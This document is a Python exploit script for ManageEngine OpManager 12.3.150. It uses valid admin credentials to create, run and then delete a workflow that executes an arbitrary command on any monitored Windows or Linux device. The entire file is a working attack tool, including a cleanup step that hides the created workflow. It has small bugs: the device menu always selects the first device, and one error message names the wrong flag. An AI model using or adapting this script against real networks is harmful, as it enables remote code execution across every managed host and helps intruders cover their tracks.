Share
#!/usr/bin/env python3

# Exploit Title: ManageEngine opManager Authenticated Code Execution
# Google Dork: N/A
# Date: 08/13/2019
# Exploit Author: @kindredsec
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/network-monitoring/download.html
# Version: 12.3.150
# Tested on: Windows Server 2016
# CVE: N/A

import requests
import re
import random
import sys
import json
import string
import argparse

C_WHITE = '\033[1;37m'
C_BLUE = '\033[1;34m'
C_GREEN = '\033[1;32m'
C_YELLOW = '\033[1;33m'
C_RED = '\033[1;31m'
C_RESET = '\033[0m'
LOGIN_FAIL_MSG = "Invalid username and/or password."

def buildRandomString(length=10):
	letters = string.ascii_lowercase
	return ''.join(random.choice(letters) for i in range(length))


def getSessionData(target, user, password):

	session = requests.Session()
	session.get(target)

	# Login Sequence
	randSid = random.uniform(-1,1)
	getParams = { "requestType" : "AJAX" , "sid" : str(randSid) }
	postData = { "eraseAutoLoginCookie" : "true" }
	session.post( url = target + "/servlets/SettingsServlet", data = postData, params = getParams )

	postData = { "loginFromCookieData" : "false",
						 "ntlmv2" : "false", 
						 "j_username" : user,
						 "j_password" : password 
						}
	initialAuth = session.post( url = target + "/j_security_check", data = postData ) 


	if LOGIN_FAIL_MSG in initialAuth.text:

		print(f"{C_RED}[-]{C_RESET} Invalid credentials specified! Could not login to OpManager.")
		sys.exit(1)

	elif initialAuth.status_code != 200:
		print(f"{C_RED}[-]{C_RESET} An Unknown Error has occurred during the authentication process.")
		sys.exit(1)

	apiKeyReg = re.search(".*\.apiKey = .*;", initialAuth.text)
	apiKey = apiKeyReg.group(0).split('"')[1]

	return { "session" : session , "apiKey" : apiKey }




def getDeviceList(target, session, apiKey):

	deviceList = session.get( target + "/api/json/v2/device/listDevices" , params = { "apiKey" : apiKey } )

	devices = {}
	devicesJsonParsed = json.loads(deviceList.text)
	for row in devicesJsonParsed["rows"]:
		devices[row["deviceName"]] = [ row["ipaddress"], row["type"] ]

	return devices



def buildTaskWindows(target, session, apiKey, device, command):

	# Build Task
	taskName = buildRandomString()
	workFlowName = buildRandomString(15)

	jsonData = """{"taskProps":{"mainTask":{"taskID":9,"dialogId":3,"name":"""
	jsonData += '"' + taskName + '"'
	jsonData += ""","deviceDisplayName":"${DeviceName}","cmdLine":"cmd.exe /c ${FileName}.bat ${DeviceName} ${UserName} ${Password} arg1","scriptBody":""" 
	jsonData += '"' + command + '"'
	jsonData +=  ""","workingDir":"${UserHomeDir}","timeout":"60","associationID":-1,"x":41,"y":132},"name":"Untitled","description":""},"triggerProps":{"workflowDetails":{"wfID":"","wfName":"""
	jsonData += '"' + workFlowName + '"' 
	jsonData += ""","wfDescription":"Thnx for Exec","triggerType":"0"},"selectedDevices":["""
	jsonData += '"' +  device + '"' 
	jsonData += """],"scheduleDetails":{"schedType":"1","selTab":"1","onceDate":"2999-08-14","onceHour":"0","onceMin":"0","dailyHour":"0","dailyMin":"0","dailyStartDate":"2019-08-14","weeklyDay":[],"wee"""
	jsonData += """klyHour":"0","weeklyMin":"0","monthlyType":"5","monthlyWeekNum":"1","monthlyDay":["1"],"monthlyHour":"0","monthlyMin":"0","yearlyMonth":["0"],"yearlyDate":"1","yearlyHour":"0","y"""
	jsonData += """earlyMin":"0"},"criteriaDetails":{}}}"""

	makeWorkFlow = session.post(url = target + "/api/json/workflow/addWorkflow", params = { "apiKey" : apiKey }, data = { "jsonData" : jsonData })

	if "has been created successfully" in makeWorkFlow.text:
		print(f"{C_GREEN}[+]{C_RESET} Successfully created Workflow")
	else:
		print(f"{C_RED}[-]{C_RESET} Issues creating workflow. Exiting . . .")
		sys.exit(1)

	return workFlowName


def buildTaskLinux(target, session, apiKey, device, command):

	taskName = buildRandomString()
	workFlowName = buildRandomString(15)

	jsonData = """{"taskProps":{"mainTask":{"taskID":9,"dialogId":3,"name":"""
	jsonData += '"' + taskName + '"'
	jsonData += ""","deviceDisplayName":"${DeviceName}","cmdLine":"sh ${FileName} ${DeviceName} arg1","scriptBody":""" 
	jsonData += '"' + command + '"'
	jsonData +=  ""","workingDir":"${UserHomeDir}","timeout":"60","associationID":-1,"x":41,"y":132},"name":"Untitled","description":""},"triggerProps":{"workflowDetails":{"wfID":"","wfName":"""
	jsonData += '"' + workFlowName + '"' 
	jsonData += ""","wfDescription":"Thnx for Exec","triggerType":"0"},"selectedDevices":["""
	jsonData += '"' +  device + '"' 
	jsonData += """],"scheduleDetails":{"schedType":"1","selTab":"1","onceDate":"2999-08-14","onceHour":"0","onceMin":"0","dailyHour":"0","dailyMin":"0","dailyStartDate":"2019-08-14","weeklyDay":[],"wee"""
	jsonData += """klyHour":"0","weeklyMin":"0","monthlyType":"5","monthlyWeekNum":"1","monthlyDay":["1"],"monthlyHour":"0","monthlyMin":"0","yearlyMonth":["0"],"yearlyDate":"1","yearlyHour":"0","y"""
	jsonData += """earlyMin":"0"},"criteriaDetails":{}}}"""

	makeWorkFlow = session.post(url = target + "/api/json/workflow/addWorkflow", params = { "apiKey" : apiKey }, data = { "jsonData" : jsonData })

	if "has been created successfully" in makeWorkFlow.text:
		print(f"{C_GREEN}[+]{C_RESET} Successfully created Workflow")
	else:
		print(f"{C_RED}[-]{C_RESET} Issues creating workflow. Exiting . . .")
		sys.exit(1)

	return workFlowName


# Get the ID of the newly created workflow
def getWorkflowID(target, session, apiKey, workflowName):

	getID = session.get(url = target + "/api/json/workflow/getWorkflowList", params = { "apiKey" : apiKey })

	rbID = -100
	workflowJsonParsed = json.loads(getID.text)
	for wf in workflowJsonParsed:
		if wf['name'] == workflowName:
			rbID = wf['rbID'] 

	if rbID == -100: 
		print(f"{C_RED}[-]{C_RESET} Issue obtaining Workflow ID. Exiting ...")
		sys.exit(1)

	return rbID


def getDeviceID(target, session, apiKey, rbID, device):

	getDevices = session.get(url = target + "/api/json/workflow/showDevicesForWorkflow", params = { "apiKey" : apiKey , "wfID" : rbID })
	wfDevicesJsonParsed = json.loads(getDevices.text)
	wfDevices = wfDevicesJsonParsed["defaultDevices"]
	deviceID = list(wfDevices.keys())[0]

	return deviceID



def runWorkflow(target, session, apiKey, rbID, device):

	targetDeviceID = getDeviceID(target, session, apiKey, rbID, device)
	
	print(f"{C_YELLOW}[!]{C_RESET} Executing Code . . .")
	workflowExec = session.post(target + "/api/json/workflow/executeWorkflow", params = { "apiKey" : apiKey }, data = { "wfID" : rbID, "deviceName" : targetDeviceID, "triggerType" : 0 }	)

	if re.match(r"^\[.*\]$", workflowExec.text.strip()):
		print(f"{C_GREEN}[+]{C_RESET} Code appears to have run successfully!")
	else:
		print(f"{C_RED}[-]{C_RESET} Unknown error has occurred. Please try again or run the process manually.")
		sys.exit(1)

	deleteWorkflow(target, session, apiKey, rbID)
	print(f"{C_GREEN}[+]{C_RESET} Exploit complete!")


def deleteWorkflow(target, session, apiKey, rbID):
	
	print(f"{C_YELLOW}[!]{C_RESET} Cleaning up . . .")
	delWorkFlow = session.post( target + "/api/json/workflow/deleteWorkflow" , params = { "apiKey" : apiKey, "wfID" : rbID })


def main():

	parser = argparse.ArgumentParser(description="Utilizes OpManager's Workflow feature to execute commands on any monitored device.")
	parser.add_argument("-t", nargs='?', metavar="target", help="The full base URL of the OpManager Instance (Example: http://192.168.1.1)")
	parser.add_argument("-u", nargs='?', metavar="user", help="The username of a valid OpManager admin account.")
	parser.add_argument("-p", nargs='?', metavar="password", help="The password of a valid OpManager admin account.")
	parser.add_argument("-c", nargs='?', metavar="command", help="The command you want to run.")

	args = parser.parse_args()
	
	insufficient_args = False
	if not args.u:
		print(f"{C_RED}[-]{C_RESET} Please specify a username with '-t'.")
		insufficient_args = True
	if not args.t:
		print(f"{C_RED}[-]{C_RESET} Please specify a target with '-t'.")
		insufficient_args = True
	if not args.p:
		print(f"{C_RED}[-]{C_RESET} Please specify a password with '-p'.")
		insufficient_args = True
	if not args.c:
		print(f"{C_RED}[-]{C_RESET} Please specify a command with '-c'.")
		insufficient_args = True

	if insufficient_args:
		sys.exit(1)

	
	sessionDat = getSessionData(args.t, args.u, args.p)
	session = sessionDat["session"]
	apiKey = sessionDat["apiKey"]

	devices = getDeviceList(args.t, session, apiKey)

	# if there's only one device in the OpManager instance, default to running commands on that device;
	# no need to ask the user.
	if len(devices.keys()) == 1:
		device = list(devices.keys())[0]
	else:
		print(f"{C_YELLOW}[!]{C_RESET} There appears to be multiple Devices within this target OpManager Instance:")
		print("")
		counter = 1
		for key in devices.keys():
			print(f"   {counter}: {key} ({devices[key][0]}) ({devices[key][1]})")

		print("")
		while True:
			try:
				prompt = f"{C_BLUE}[?]{C_RESET} Please specify which Device you want to run your command on: "
				devSelect = int(input(prompt))
			except KeyboardInterrupt:
				sys.exit(1)
			except ValueError:
				print(f"{C_RED}[-]{C_RESET} Error. Invalid Device number selected. Quitting . . .")
				sys.exit(1)
	
			if devSelect < 1 or devSelect > len(list(devices.keys())):
				print(f"{C_RED}[-]{C_RESET} Error. Invalid Device number selected. Quitting . . .")
				sys.exit(1)

			else:
				device = list(devices.keys())[counter - 1]
				break

	# don't hate, it works doesn't it?
	if "indows" in devices[device][1]:
		workflowName = buildTaskWindows(args.t, session, apiKey, device, args.c)
	else:
		workflowName = buildTaskLinux(args.t, session, apiKey, device, args.c)

	workflowID =  getWorkflowID(args.t, session, apiKey, workflowName)
	runWorkflow(args.t, session, apiKey, workflowID, device)
	
	
main()